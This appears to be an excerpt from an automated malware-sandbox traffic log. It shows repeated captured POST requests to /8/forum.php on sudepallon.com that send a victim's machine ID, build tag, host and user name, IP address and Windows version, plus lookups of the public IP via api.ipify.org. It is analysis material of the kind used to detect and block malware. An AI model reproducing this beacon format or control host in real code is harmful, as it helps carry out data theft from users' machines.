                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                  Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sudepallon.comContent-Length: 121Cache-Control: no-cacheData Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29 Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
